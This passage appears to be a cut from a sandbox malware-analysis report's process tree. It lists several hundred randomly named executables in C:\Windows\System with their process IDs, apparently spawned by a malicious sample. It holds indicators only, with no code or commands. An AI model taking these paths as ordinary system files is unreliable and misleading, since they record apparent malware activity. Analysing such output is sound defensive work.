  2⤵
  PID:5428
- C:\Windows\System\pDcfgKo.exe
  C:\Windows\System\pDcfgKo.exe
  2⤵
  PID:5572
- C:\Windows\System\rPGQKWe.exe
  C:\Windows\System\rPGQKWe.exe
  2⤵
  PID:6160
- C:\Windows\System\RhXRyIe.exe
  C:\Windows\System\RhXRyIe.exe
  2⤵
  PID:6188
- C:\Windows\System\YjkFvwj.exe
  C:\Windows\System\YjkFvwj.exe
  2⤵
  PID:6216
- C:\Windows\System\ZjqfJql.exe
  C:\Windows\System\ZjqfJql.exe
  2⤵
  PID:6244
- C:\Windows\System\FRIyBga.exe
  C:\Windows\System\FRIyBga.exe
  2⤵
  PID:6288
- C:\Windows\System\GkyaizB.exe
  C:\Windows\System\GkyaizB.exe
  2⤵
  PID:6312
- C:\Windows\System\cUvUFZF.exe
  C:\Windows\System\cUvUFZF.exe
  2⤵
  PID:6332
- C:\Windows\System\BlSVIKT.exe
  C:\Windows\System\BlSVIKT.exe
  2⤵
  PID:6360
- C:\Windows\System\COtSGHm.exe
  C:\Windows\System\COtSGHm.exe
  2⤵
  PID:6388
- C:\Windows\System\SFPcpUg.exe
  C:\Windows\System\SFPcpUg.exe
  2⤵
  PID:6412
- C:\Windows\System\rImehQU.exe
  C:\Windows\System\rImehQU.exe
  2⤵
  PID:6444
- C:\Windows\System\wcQcdYk.exe
  C:\Windows\System\wcQcdYk.exe
  2⤵
  PID:6472
- C:\Windows\System\wmbRzKN.exe
  C:\Windows\System\wmbRzKN.exe
  2⤵
  PID:6496
- C:\Windows\System\yBmXHIB.exe
  C:\Windows\System\yBmXHIB.exe
  2⤵
  PID:6524
- C:\Windows\System\JAbPjlJ.exe
  C:\Windows\System\JAbPjlJ.exe
  2⤵
  PID:6552
- C:\Windows\System\qcJSvTP.exe
  C:\Windows\System\qcJSvTP.exe
  2⤵
  PID:6584
- C:\Windows\System\CPmmRMf.exe
  C:\Windows\System\CPmmRMf.exe
  2⤵
  PID:6612
- C:\Windows\System\eMYEFnA.exe
  C:\Windows\System\eMYEFnA.exe
  2⤵
  PID:6648
- C:\Windows\System\tgLRgLs.exe
  C:\Windows\System\tgLRgLs.exe
  2⤵
  PID:6680
- C:\Windows\System\rXwlvCG.exe
  C:\Windows\System\rXwlvCG.exe
  2⤵
  PID:6708
- C:\Windows\System\VVvRasZ.exe
  C:\Windows\System\VVvRasZ.exe
  2⤵
  PID:6724
- C:\Windows\System\BPNcuMH.exe
  C:\Windows\System\BPNcuMH.exe
  2⤵
  PID:6748
- C:\Windows\System\emlaNNb.exe
  C:\Windows\System\emlaNNb.exe
  2⤵
  PID:6776
- C:\Windows\System\APHrMXP.exe
  C:\Windows\System\APHrMXP.exe
  2⤵
  PID:6816
- C:\Windows\System\tOEdTVM.exe
  C:\Windows\System\tOEdTVM.exe
  2⤵
  PID:6856
- C:\Windows\System\rWWjVWB.exe
  C:\Windows\System\rWWjVWB.exe
  2⤵
  PID:6876
- C:\Windows\System\jRcHeIT.exe
  C:\Windows\System\jRcHeIT.exe
  2⤵
  PID:6892
- C:\Windows\System\NVLZQnd.exe
  C:\Windows\System\NVLZQnd.exe
  2⤵
  PID:6916
- C:\Windows\System\ZsLfBHu.exe
  C:\Windows\System\ZsLfBHu.exe
  2⤵
  PID:6944
- C:\Windows\System\wztIhTE.exe
  C:\Windows\System\wztIhTE.exe
  2⤵
  PID:6972
- C:\Windows\System\XNWbhBm.exe
  C:\Windows\System\XNWbhBm.exe
  2⤵
  PID:7000
- C:\Windows\System\AGrfPAa.exe
  C:\Windows\System\AGrfPAa.exe
  2⤵
  PID:7032
- C:\Windows\System\tbxHwBP.exe
  C:\Windows\System\tbxHwBP.exe
  2⤵
  PID:7056
- C:\Windows\System\LAqwYTh.exe
  C:\Windows\System\LAqwYTh.exe
  2⤵
  PID:7084
- C:\Windows\System\RZVyEJy.exe
  C:\Windows\System\RZVyEJy.exe
  2⤵
  PID:7112
- C:\Windows\System\lDxRMZC.exe
  C:\Windows\System\lDxRMZC.exe
  2⤵
  PID:7140
- C:\Windows\System\bbBSGXy.exe
  C:\Windows\System\bbBSGXy.exe
  2⤵
  PID:5928
- C:\Windows\System\pxciIMD.exe
  C:\Windows\System\pxciIMD.exe
  2⤵
  PID:400
- C:\Windows\System\fiMchrr.exe
  C:\Windows\System\fiMchrr.exe
  2⤵
  PID:6148
- C:\Windows\System\fXysYVR.exe
  C:\Windows\System\fXysYVR.exe
  2⤵
  PID:6208
- C:\Windows\System\NAzPFXc.exe
  C:\Windows\System\NAzPFXc.exe
  2⤵
  PID:6260
- C:\Windows\System\rnewOKM.exe
  C:\Windows\System\rnewOKM.exe
  2⤵
  PID:6308
- C:\Windows\System\tqrcBos.exe
  C:\Windows\System\tqrcBos.exe
  2⤵
  PID:6380
- C:\Windows\System\oQzrgCC.exe
  C:\Windows\System\oQzrgCC.exe
  2⤵
  PID:6436
- C:\Windows\System\omhyBId.exe
  C:\Windows\System\omhyBId.exe
  2⤵
  PID:6512
- C:\Windows\System\DPwbtEm.exe
  C:\Windows\System\DPwbtEm.exe
  2⤵
  PID:6600
- C:\Windows\System\zhgSHRA.exe
  C:\Windows\System\zhgSHRA.exe
  2⤵
  PID:6676
- C:\Windows\System\CByUfSm.exe
  C:\Windows\System\CByUfSm.exe
  2⤵
  PID:6716
- C:\Windows\System\xshccMX.exe
  C:\Windows\System\xshccMX.exe
  2⤵
  PID:6768
- C:\Windows\System\AvSjCVM.exe
  C:\Windows\System\AvSjCVM.exe
  2⤵
  PID:6848
- C:\Windows\System\AxkUkHe.exe
  C:\Windows\System\AxkUkHe.exe
  2⤵
  PID:6888
- C:\Windows\System\bWLLrcp.exe
  C:\Windows\System\bWLLrcp.exe
  2⤵
  PID:6960
- C:\Windows\System\takoSCI.exe
  C:\Windows\System\takoSCI.exe
  2⤵
  PID:6996
- C:\Windows\System\OFzNeuf.exe
  C:\Windows\System\OFzNeuf.exe
  2⤵
  PID:7052
- C:\Windows\System\ZxiLymv.exe
  C:\Windows\System\ZxiLymv.exe
  2⤵
  PID:7100
- C:\Windows\System\fayuaWW.exe
  C:\Windows\System\fayuaWW.exe
  2⤵
  PID:7156
- C:\Windows\System\uPYinxh.exe
  C:\Windows\System\uPYinxh.exe
  2⤵
  PID:3812
- C:\Windows\System\PIHslAe.exe
  C:\Windows\System\PIHslAe.exe
  2⤵
  PID:6236
- C:\Windows\System\jNhGkBR.exe
  C:\Windows\System\jNhGkBR.exe
  2⤵
  PID:4104
- C:\Windows\System\IgZIqsF.exe
  C:\Windows\System\IgZIqsF.exe
  2⤵
  PID:6484
- C:\Windows\System\aYALZNX.exe
  C:\Windows\System\aYALZNX.exe
  2⤵
  PID:6572
- C:\Windows\System\lbRcTsU.exe
  C:\Windows\System\lbRcTsU.exe
  2⤵
  PID:6992
- C:\Windows\System\SKYfukk.exe
  C:\Windows\System\SKYfukk.exe
  2⤵
  PID:4148
- C:\Windows\System\pFwXWVC.exe
  C:\Windows\System\pFwXWVC.exe
  2⤵
  PID:7136
- C:\Windows\System\SiOJZiL.exe
  C:\Windows\System\SiOJZiL.exe
  2⤵
  PID:4552
- C:\Windows\System\ytNTMrx.exe
  C:\Windows\System\ytNTMrx.exe
  2⤵
  PID:6184
- C:\Windows\System\GlBAmkS.exe
  C:\Windows\System\GlBAmkS.exe
  2⤵
  PID:2952
- C:\Windows\System\fKNXtFk.exe
  C:\Windows\System\fKNXtFk.exe
  2⤵
  PID:3040
- C:\Windows\System\GtkMOkM.exe
  C:\Windows\System\GtkMOkM.exe
  2⤵
  PID:4068
- C:\Windows\System\EgRTNCH.exe
  C:\Windows\System\EgRTNCH.exe
  2⤵
  PID:6700
- C:\Windows\System\tADAtvQ.exe
  C:\Windows\System\tADAtvQ.exe
  2⤵
  PID:3164
- C:\Windows\System\oHwLJZi.exe
  C:\Windows\System\oHwLJZi.exe
  2⤵
  PID:824
- C:\Windows\System\nqVaoOq.exe
  C:\Windows\System\nqVaoOq.exe
  2⤵
  PID:872
- C:\Windows\System\AxEdIHI.exe
  C:\Windows\System\AxEdIHI.exe
  2⤵
  PID:940
- C:\Windows\System\qXDbVpH.exe
  C:\Windows\System\qXDbVpH.exe
  2⤵
  PID:6644
- C:\Windows\System\DTtwaHw.exe
  C:\Windows\System\DTtwaHw.exe
  2⤵
  PID:3012
- C:\Windows\System\MkCqUXA.exe
  C:\Windows\System\MkCqUXA.exe
  2⤵
  PID:572
- C:\Windows\System\vuYLSLx.exe
  C:\Windows\System\vuYLSLx.exe
  2⤵
  PID:988
- C:\Windows\System\LpCGFfl.exe
  C:\Windows\System\LpCGFfl.exe
  2⤵
  PID:3600
- C:\Windows\System\qcYONuB.exe
  C:\Windows\System\qcYONuB.exe
  2⤵
  PID:736
- C:\Windows\System\gypFhrg.exe
  C:\Windows\System\gypFhrg.exe
  2⤵
  PID:2236
- C:\Windows\System\YFCkXsy.exe
  C:\Windows\System\YFCkXsy.exe
  2⤵
  PID:2800
- C:\Windows\System\msSLbwv.exe
  C:\Windows\System\msSLbwv.exe
  2⤵
  PID:2816
- C:\Windows\System\PlNQTMk.exe
  C:\Windows\System\PlNQTMk.exe
  2⤵
  PID:7196
- C:\Windows\System\xvCEPhi.exe
  C:\Windows\System\xvCEPhi.exe
  2⤵
  PID:7240
- C:\Windows\System\RXytUWY.exe
  C:\Windows\System\RXytUWY.exe
  2⤵
  PID:7256
- C:\Windows\System\FVGLcMD.exe
  C:\Windows\System\FVGLcMD.exe
  2⤵
  PID:7284
- C:\Windows\System\sQFGifO.exe
  C:\Windows\System\sQFGifO.exe
  2⤵
  PID:7312
- C:\Windows\System\gLoEPVk.exe
  C:\Windows\System\gLoEPVk.exe
  2⤵
  PID:7340
- C:\Windows\System\RVRmICA.exe
  C:\Windows\System\RVRmICA.exe
  2⤵
  PID:7368
- C:\Windows\System\McTfIYv.exe
  C:\Windows\System\McTfIYv.exe
  2⤵
  PID:7396
- C:\Windows\System\AwIgyld.exe
  C:\Windows\System\AwIgyld.exe
  2⤵
  PID:7424
- C:\Windows\System\mxSWblp.exe
  C:\Windows\System\mxSWblp.exe
  2⤵
  PID:7440
- C:\Windows\System\yIdxyVA.exe
  C:\Windows\System\yIdxyVA.exe
  2⤵
  PID:7472
- C:\Windows\System\qXVCMaS.exe
  C:\Windows\System\qXVCMaS.exe
  2⤵
  PID:7496
- C:\Windows\System\FpXOTFl.exe
  C:\Windows\System\FpXOTFl.exe
  2⤵
  PID:7524
- C:\Windows\System\qpBjmVB.exe
  C:\Windows\System\qpBjmVB.exe
  2⤵
  PID:7540
- C:\Windows\System\uLpZVit.exe
  C:\Windows\System\uLpZVit.exe
  2⤵
  PID:7572
- C:\Windows\System\TQpSkpO.exe
  C:\Windows\System\TQpSkpO.exe
  2⤵
  PID:7608
- C:\Windows\System\aPKbZuU.exe
  C:\Windows\System\aPKbZuU.exe
  2⤵
  PID:7640
- C:\Windows\System\BpNOhFY.exe
  C:\Windows\System\BpNOhFY.exe
  2⤵
  PID:7668
- C:\Windows\System\CUlQHPL.exe
  C:\Windows\System\CUlQHPL.exe
  2⤵
  PID:7700
- C:\Windows\System\CGQDBxk.exe
  C:\Windows\System\CGQDBxk.exe
  2⤵
  PID:7724
- C:\Windows\System\NthSNkG.exe
  C:\Windows\System\NthSNkG.exe
  2⤵
  PID:7768
- C:\Windows\System\eAZjcMH.exe
  C:\Windows\System\eAZjcMH.exe
  2⤵
  PID:7812
- C:\Windows\System\qUiyieT.exe
  C:\Windows\System\qUiyieT.exe
  2⤵
  PID:7852
- C:\Windows\System\bButsKV.exe
  C:\Windows\System\bButsKV.exe
  2⤵
  PID:7876
- C:\Windows\System\lidewVU.exe
  C:\Windows\System\lidewVU.exe
  2⤵
  PID:7900
- C:\Windows\System\XoiHKma.exe
  C:\Windows\System\XoiHKma.exe
  2⤵
  PID:7932
- C:\Windows\System\JiOFOmq.exe
  C:\Windows\System\JiOFOmq.exe
  2⤵
  PID:7956
- C:\Windows\System\RHJrGtI.exe
  C:\Windows\System\RHJrGtI.exe
  2⤵
  PID:7984
- C:\Windows\System\LepCTPk.exe
  C:\Windows\System\LepCTPk.exe
  2⤵
  PID:8016
- C:\Windows\System\tKgezrJ.exe
  C:\Windows\System\tKgezrJ.exe
  2⤵
  PID:8044
- C:\Windows\System\nqgiLyo.exe
  C:\Windows\System\nqgiLyo.exe
  2⤵
  PID:8076
- C:\Windows\System\uXudYXl.exe
  C:\Windows\System\uXudYXl.exe
  2⤵
  PID:8136
- C:\Windows\System\UpKHvDu.exe
  C:\Windows\System\UpKHvDu.exe
  2⤵
  PID:8172
- C:\Windows\System\GOPRZpJ.exe
  C:\Windows\System\GOPRZpJ.exe
  2⤵
  PID:6488
- C:\Windows\System\ZpSeEoh.exe
  C:\Windows\System\ZpSeEoh.exe
  2⤵
  PID:7216
- C:\Windows\System\KDznDxN.exe
  C:\Windows\System\KDznDxN.exe
  2⤵
  PID:7360
- C:\Windows\System\KbxhoKj.exe
  C:\Windows\System\KbxhoKj.exe
  2⤵
  PID:7416
- C:\Windows\System\gwuzApV.exe
  C:\Windows\System\gwuzApV.exe
  2⤵
  PID:7456
- C:\Windows\System\IBActdn.exe
  C:\Windows\System\IBActdn.exe
  2⤵
  PID:7520
- C:\Windows\System\DsZaGiv.exe
  C:\Windows\System\DsZaGiv.exe
  2⤵
  PID:7552
- C:\Windows\System\tGCuzqm.exe
  C:\Windows\System\tGCuzqm.exe
  2⤵
  PID:7592
- C:\Windows\System\CxdmKUw.exe
  C:\Windows\System\CxdmKUw.exe
  2⤵
  PID:7688
- C:\Windows\System\whcMygR.exe
  C:\Windows\System\whcMygR.exe
  2⤵
  PID:7760
- C:\Windows\System\ZZZzqnY.exe
  C:\Windows\System\ZZZzqnY.exe
  2⤵
  PID:7828
- C:\Windows\System\sWfDPJx.exe
  C:\Windows\System\sWfDPJx.exe
  2⤵
  PID:8056
- C:\Windows\System\RDivDBu.exe
  C:\Windows\System\RDivDBu.exe
  2⤵
  PID:8164
- C:\Windows\System\HeEzPwq.exe
  C:\Windows\System\HeEzPwq.exe
  2⤵
  PID:8188
- C:\Windows\System\tGMmgCa.exe
  C:\Windows\System\tGMmgCa.exe
  2⤵
  PID:7276
- C:\Windows\System\AakaHwS.exe
  C:\Windows\System\AakaHwS.exe
  2⤵
  PID:1888
- C:\Windows\System\FVvrXNy.exe
  C:\Windows\System\FVvrXNy.exe
  2⤵
  PID:7748
- C:\Windows\System\rbIcEpu.exe
  C:\Windows\System\rbIcEpu.exe
  2⤵
  PID:7804
- C:\Windows\System\NKrXHZG.exe
  C:\Windows\System\NKrXHZG.exe
  2⤵
  PID:7888
- C:\Windows\System\xpdVFAC.exe
  C:\Windows\System\xpdVFAC.exe
  2⤵
  PID:7588
- C:\Windows\System\AeljZVo.exe
  C:\Windows\System\AeljZVo.exe
  2⤵
  PID:7564
- C:\Windows\System\nXiFpES.exe
  C:\Windows\System\nXiFpES.exe
  2⤵
  PID:7192
- C:\Windows\System\rpvAYze.exe
  C:\Windows\System\rpvAYze.exe
  2⤵
  PID:7908
- C:\Windows\System\KfTeWOb.exe
  C:\Windows\System\KfTeWOb.exe
  2⤵
  PID:7248
- C:\Windows\System\KxgoUhY.exe
  C:\Windows\System\KxgoUhY.exe
  2⤵
  PID:7948
- C:\Windows\System\WDyDlEx.exe
  C:\Windows\System\WDyDlEx.exe
  2⤵
  PID:8204
- C:\Windows\System\FflANMM.exe
  C:\Windows\System\FflANMM.exe
  2⤵
  PID:8232
- C:\Windows\System\kPtbeSv.exe
  C:\Windows\System\kPtbeSv.exe
  2⤵
  PID:8248
- C:\Windows\System\XDQjjmr.exe
  C:\Windows\System\XDQjjmr.exe
  2⤵
  PID:8264
- C:\Windows\System\BGweHdP.exe
  C:\Windows\System\BGweHdP.exe
  2⤵
  PID:8296
- C:\Windows\System\ZygSUKe.exe
  C:\Windows\System\ZygSUKe.exe
  2⤵
  PID:8340
- C:\Windows\System\gEKUkVc.exe
  C:\Windows\System\gEKUkVc.exe
  2⤵
  PID:8384
- C:\Windows\System\jsTDYKz.exe
  C:\Windows\System\jsTDYKz.exe
  2⤵
  PID:8412
- C:\Windows\System\LTiBOBp.exe
  C:\Windows\System\LTiBOBp.exe
  2⤵
  PID:8448
- C:\Windows\System\sNoCwie.exe
  C:\Windows\System\sNoCwie.exe
  2⤵
  PID:8476
- C:\Windows\System\ZpNNfAB.exe
  C:\Windows\System\ZpNNfAB.exe
  2⤵
  PID:8504
- C:\Windows\System\iQJuoLT.exe
  C:\Windows\System\iQJuoLT.exe
  2⤵
  PID:8552
- C:\Windows\System\mOxHoJR.exe
  C:\Windows\System\mOxHoJR.exe
  2⤵
  PID:8572
- C:\Windows\System\zDwzSGo.exe
  C:\Windows\System\zDwzSGo.exe
  2⤵
  PID:8600
- C:\Windows\System\CpVkBvT.exe
  C:\Windows\System\CpVkBvT.exe
  2⤵
  PID:8628
- C:\Windows\System\YpMkwkh.exe
  C:\Windows\System\YpMkwkh.exe
  2⤵
  PID:8656
- C:\Windows\System\atLTXce.exe
  C:\Windows\System\atLTXce.exe
  2⤵
  PID:8684
- C:\Windows\System\cTMIVzS.exe
  C:\Windows\System\cTMIVzS.exe
  2⤵
  PID:8724
- C:\Windows\System\REhIbrM.exe
  C:\Windows\System\REhIbrM.exe
  2⤵
  PID:8752
- C:\Windows\System\WIBlngS.exe
  C:\Windows\System\WIBlngS.exe
  2⤵
  PID:8780
- C:\Windows\System\FiQoDjo.exe
  C:\Windows\System\FiQoDjo.exe
  2⤵
  PID:8808
- C:\Windows\System\MjzbshG.exe
  C:\Windows\System\MjzbshG.exe
  2⤵
  PID:8844
- C:\Windows\System\Ivcnwvd.exe
  C:\Windows\System\Ivcnwvd.exe
  2⤵
  PID:8884
- C:\Windows\System\YGLrElC.exe
  C:\Windows\System\YGLrElC.exe
  2⤵
  PID:8940
- C:\Windows\System\wzFdpgw.exe
  C:\Windows\System\wzFdpgw.exe
  2⤵
  PID:8968
- C:\Windows\System\AyglVKa.exe
  C:\Windows\System\AyglVKa.exe
  2⤵
  PID:8992
- C:\Windows\System\hTMYRBQ.exe
  C:\Windows\System\hTMYRBQ.exe
  2⤵
  PID:9028
- C:\Windows\System\LskWCMs.exe
  C:\Windows\System\LskWCMs.exe
  2⤵
  PID:9056
- C:\Windows\System\sWGOgBl.exe
  C:\Windows\System\sWGOgBl.exe
  2⤵
  PID:9092
- C:\Windows\System\muPerxm.exe
  C:\Windows\System\muPerxm.exe
  2⤵
  PID:9140
- C:\Windows\System\yEvoioc.exe
  C:\Windows\System\yEvoioc.exe
  2⤵
  PID:9184
- C:\Windows\System\MxlJKwU.exe
  C:\Windows\System\MxlJKwU.exe
  2⤵
  PID:8196
- C:\Windows\System\dADTvKC.exe
  C:\Windows\System\dADTvKC.exe
  2⤵
  PID:8240
- C:\Windows\System\DZmOqvu.exe
  C:\Windows\System\DZmOqvu.exe
  2⤵
  PID:8288
- C:\Windows\System\FPRcuGb.exe
  C:\Windows\System\FPRcuGb.exe
  2⤵
  PID:7180
- C:\Windows\System\VlcjsEh.exe
  C:\Windows\System\VlcjsEh.exe
  2⤵
  PID:2516
- C:\Windows\System\GmmDimW.exe
  C:\Windows\System\GmmDimW.exe
  2⤵
  PID:8424
- C:\Windows\System\SPLuMEp.exe
  C:\Windows\System\SPLuMEp.exe
  2⤵
  PID:8472
- C:\Windows\System\gYdMKBO.exe
  C:\Windows\System\gYdMKBO.exe
  2⤵
  PID:8524
- C:\Windows\System\VFHGwBa.exe
  C:\Windows\System\VFHGwBa.exe
  2⤵
  PID:8624
- C:\Windows\System\eYjOGER.exe
  C:\Windows\System\eYjOGER.exe
  2⤵
  PID:8696
- C:\Windows\System\KNtlnzB.exe
  C:\Windows\System\KNtlnzB.exe
  2⤵
  PID:8772
- C:\Windows\System\ibWAFol.exe
  C:\Windows\System\ibWAFol.exe
  2⤵
  PID:8856
- C:\Windows\System\uftRnJf.exe
  C:\Windows\System\uftRnJf.exe
  2⤵
  PID:8964
- C:\Windows\System\lCKGeWQ.exe
  C:\Windows\System\lCKGeWQ.exe
  2⤵
  PID:9040
- C:\Windows\System\BmQuIcH.exe
  C:\Windows\System\BmQuIcH.exe
  2⤵
  PID:7676
- C:\Windows\System\ltYuNLS.exe
  C:\Windows\System\ltYuNLS.exe
  2⤵
  PID:9128
- C:\Windows\System\rYQtQLG.exe
  C:\Windows\System\rYQtQLG.exe
  2⤵
  PID:9200
- C:\Windows\System\VrmQQCL.exe
  C:\Windows\System\VrmQQCL.exe
  2⤵
  PID:8216
- C:\Windows\System\MZnqUaX.exe
  C:\Windows\System\MZnqUaX.exe
  2⤵
  PID:8336
- C:\Windows\System\YbIwJRN.exe
  C:\Windows\System\YbIwJRN.exe
  2⤵
  PID:8444
- C:\Windows\System\HgHEKQA.exe
  C:\Windows\System\HgHEKQA.exe
  2⤵
  PID:2260
- C:\Windows\System\cccsVVO.exe
  C:\Windows\System\cccsVVO.exe
  2⤵
  PID:8748
- C:\Windows\System\GyNFJFv.exe
  C:\Windows\System\GyNFJFv.exe
  2⤵
  PID:8952
- C:\Windows\System\dfALjWT.exe
  C:\Windows\System\dfALjWT.exe
  2⤵
  PID:9180
- C:\Windows\System\xYlCQIl.exe
  C:\Windows\System\xYlCQIl.exe
  2⤵
  PID:8308
- C:\Windows\System\QxZqrOu.exe
  C:\Windows\System\QxZqrOu.exe
  2⤵
  PID:8516
- C:\Windows\System\GVAQftC.exe
  C:\Windows\System\GVAQftC.exe
  2⤵
  PID:8820
- C:\Windows\System\MmZjtdK.exe
  C:\Windows\System\MmZjtdK.exe
  2⤵
  PID:9120
- C:\Windows\System\dXunryk.exe
  C:\Windows\System\dXunryk.exe
  2⤵
  PID:8680
- C:\Windows\System\xeZmwYv.exe
  C:\Windows\System\xeZmwYv.exe
  2⤵
  PID:8400
- C:\Windows\System\tihxzKp.exe
  C:\Windows\System\tihxzKp.exe
  2⤵
  PID:9224
- C:\Windows\System\dFebbng.exe
  C:\Windows\System\dFebbng.exe
  2⤵
  PID:9256
- C:\Windows\System\WeIGMUk.exe
  C:\Windows\System\WeIGMUk.exe
  2⤵
  PID:9288
- C:\Windows\System\GGuTjSC.exe
  C:\Windows\System\GGuTjSC.exe
  2⤵
  PID:9320
- C:\Windows\System\OeVNmgt.exe
  C:\Windows\System\OeVNmgt.exe
  2⤵
  PID:9348
- C:\Windows\System\XplnzTO.exe
  C:\Windows\System\XplnzTO.exe
  2⤵
  PID:9376
- C:\Windows\System\pBoSKrV.exe
  C:\Windows\System\pBoSKrV.exe
  2⤵
  PID:9404
- C:\Windows\System\BBiiBZj.exe
  C:\Windows\System\BBiiBZj.exe
  2⤵
  PID:9432
- C:\Windows\System\mwQUuNC.exe
  C:\Windows\System\mwQUuNC.exe
  2⤵
  PID:9460
- C:\Windows\System\UskXvMz.exe
  C:\Windows\System\UskXvMz.exe
  2⤵
  PID:9492
- C:\Windows\System\XxvCcYl.exe
  C:\Windows\System\XxvCcYl.exe
  2⤵
  PID:9520
- C:\Windows\System\KpRRzhC.exe
  C:\Windows\System\KpRRzhC.exe
  2⤵
  PID:9548
- C:\Windows\System\yaWjmbA.exe
  C:\Windows\System\yaWjmbA.exe
  2⤵
  PID:9576
- C:\Windows\System\Edcdkum.exe
  C:\Windows\System\Edcdkum.exe
  2⤵
  PID:9604
- C:\Windows\System\fbOZMIM.exe
  C:\Windows\System\fbOZMIM.exe
  2⤵
  PID:9632
- C:\Windows\System\DsBFyQc.exe
  C:\Windows\System\DsBFyQc.exe
  2⤵
  PID:9660
- C:\Windows\System\kRQnkEm.exe
  C:\Windows\System\kRQnkEm.exe
  2⤵
  PID:9688
- C:\Windows\System\hSLQHrJ.exe
  C:\Windows\System\hSLQHrJ.exe
  2⤵
  PID:9716
- C:\Windows\System\AowzBlJ.exe
  C:\Windows\System\AowzBlJ.exe
  2⤵
  PID:9744
- C:\Windows\System\gIcujUg.exe
  C:\Windows\System\gIcujUg.exe
  2⤵
  PID:9772
- C:\Windows\System\zLwLrns.exe
  C:\Windows\System\zLwLrns.exe
  2⤵
  PID:9804
- C:\Windows\System\ZWKzSrw.exe
  C:\Windows\System\ZWKzSrw.exe
  2⤵
  PID:9832
- C:\Windows\System\aYOJsSZ.exe
  C:\Windows\System\aYOJsSZ.exe
  2⤵
  PID:9860
- C:\Windows\System\wXMkHrd.exe
  C:\Windows\System\wXMkHrd.exe
  2⤵
  PID:9888
- C:\Windows\System\CYggbPb.exe
  C:\Windows\System\CYggbPb.exe
  2⤵
  PID:9916
- C:\Windows\System\hYaBYyt.exe
  C:\Windows\System\hYaBYyt.exe
  2⤵
  PID:9948
- C:\Windows\System\ZqoAGiR.exe
  C:\Windows\System\ZqoAGiR.exe
  2⤵
  PID:9976
- C:\Windows\System\zIbiABS.exe
  C:\Windows\System\zIbiABS.exe
  2⤵
  PID:10004
- C:\Windows\System\yXCEsac.exe
  C:\Windows\System\yXCEsac.exe
  2⤵
  PID:10032
- C:\Windows\System\OfQSVWf.exe
  C:\Windows\System\OfQSVWf.exe
  2⤵
  PID:10060
- C:\Windows\System\TSkbcPI.exe
  C:\Windows\System\TSkbcPI.exe
  2⤵
  PID:10088
- C:\Windows\System\xheowPJ.exe
  C:\Windows\System\xheowPJ.exe
  2⤵
  PID:10116
- C:\Windows\System\LjafKZv.exe
  C:\Windows\System\LjafKZv.exe
  2⤵
  PID:10144
- C:\Windows\System\OEGbKVb.exe
  C:\Windows\System\OEGbKVb.exe
  2⤵
  PID:10192
- C:\Windows\System\TMDvysH.exe
  C:\Windows\System\TMDvysH.exe
  2⤵
  PID:10212
- C:\Windows\System\iVLVHOg.exe
  C:\Windows\System\iVLVHOg.exe
  2⤵
  PID:10236
- C:\Windows\System\MFILEFi.exe
  C:\Windows\System\MFILEFi.exe
  2⤵
  PID:9248
- C:\Windows\System\RWxzhhe.exe
  C:\Windows\System\RWxzhhe.exe
  2⤵
  PID:9280
- C:\Windows\System\NuoZqNk.exe
  C:\Windows\System\NuoZqNk.exe
  2⤵
  PID:9336
- C:\Windows\System\UvRnKNL.exe
  C:\Windows\System\UvRnKNL.exe
  2⤵
  PID:9416
- C:\Windows\System\YGzeXht.exe
  C:\Windows\System\YGzeXht.exe
  2⤵
  PID:9484
- C:\Windows\System\cReolPs.exe
  C:\Windows\System\cReolPs.exe
  2⤵
  PID:9532
- C:\Windows\System\BrjnOCN.exe
  C:\Windows\System\BrjnOCN.exe
  2⤵
  PID:9628
- C:\Windows\System\YyHmPlx.exe
  C:\Windows\System\YyHmPlx.exe
  2⤵
  PID:9656
- C:\Windows\System\axbRPTA.exe
  C:\Windows\System\axbRPTA.exe
  2⤵
  PID:9732
- C:\Windows\System\AfrLRiA.exe
  C:\Windows\System\AfrLRiA.exe
  2⤵
  PID:9768
- C:\Windows\System\XSBVDcf.exe
  C:\Windows\System\XSBVDcf.exe
  2⤵
  PID:9828
- C:\Windows\System\mdROdCz.exe
  C:\Windows\System\mdROdCz.exe
  2⤵
  PID:9884
- C:\Windows\System\gAluGbv.exe
  C:\Windows\System\gAluGbv.exe
  2⤵
  PID:9960
- C:\Windows\System\RBmsmfE.exe
  C:\Windows\System\RBmsmfE.exe
  2⤵
  PID:10016
- C:\Windows\System\OTZwEUl.exe
  C:\Windows\System\OTZwEUl.exe
  2⤵
  PID:10056
- C:\Windows\System\oYGEiwJ.exe
  C:\Windows\System\oYGEiwJ.exe
  2⤵
  PID:10156
- C:\Windows\System\midbbjU.exe
  C:\Windows\System\midbbjU.exe
  2⤵
  PID:1288
- C:\Windows\System\pycMJPS.exe
  C:\Windows\System\pycMJPS.exe
  2⤵
  PID:3084
- C:\Windows\System\gvYPypJ.exe
  C:\Windows\System\gvYPypJ.exe
  2⤵
  PID:1556
- C:\Windows\System\YMcQLVB.exe
  C:\Windows\System\YMcQLVB.exe
  2⤵
  PID:3392
- C:\Windows\System\FJmQORY.exe
  C:\Windows\System\FJmQORY.exe
  2⤵
  PID:10232
- C:\Windows\System\mlVSEja.exe
  C:\Windows\System\mlVSEja.exe
  2⤵
  PID:9220
- C:\Windows\System\zaJmYjA.exe
  C:\Windows\System\zaJmYjA.exe
  2⤵
  PID:10184
- C:\Windows\System\OBRPpZi.exe
  C:\Windows\System\OBRPpZi.exe
  2⤵
  PID:1460
- C:\Windows\System\FdJSoNI.exe
  C:\Windows\System\FdJSoNI.exe
  2⤵
  PID:9572
- C:\Windows\System\serhMDz.exe
  C:\Windows\System\serhMDz.exe
  2⤵
  PID:1892
- C:\Windows\System\FiUtaLA.exe
  C:\Windows\System\FiUtaLA.exe
  2⤵
  PID:9880
- C:\Windows\System\uVslIEb.exe
  C:\Windows\System\uVslIEb.exe
  2⤵
  PID:10024
- C:\Windows\System\RKiOFnJ.exe
  C:\Windows\System\RKiOFnJ.exe
  2⤵
  PID:10180
- C:\Windows\System\HfJJJAQ.exe
  C:\Windows\System\HfJJJAQ.exe
  2⤵
  PID:10168
- C:\Windows\System\nFkYsER.exe
  C:\Windows\System\nFkYsER.exe
  2⤵
  PID:10228
- C:\Windows\System\sZtXdxz.exe
  C:\Windows\System\sZtXdxz.exe
  2⤵
  PID:9372
- C:\Windows\System\AiRPpjJ.exe
  C:\Windows\System\AiRPpjJ.exe
  2⤵
  PID:3764
- C:\Windows\System\YCgYwNO.exe
  C:\Windows\System\YCgYwNO.exe
  2⤵
  PID:9856
- C:\Windows\System\KAJbTPd.exe
  C:\Windows\System\KAJbTPd.exe
  2⤵
  PID:9940
- C:\Windows\System\SUOBcvx.exe
  C:\Windows\System\SUOBcvx.exe
  2⤵
  PID:9284
- C:\Windows\System\ABnzXZO.exe
  C:\Windows\System\ABnzXZO.exe
  2⤵
  PID:3008
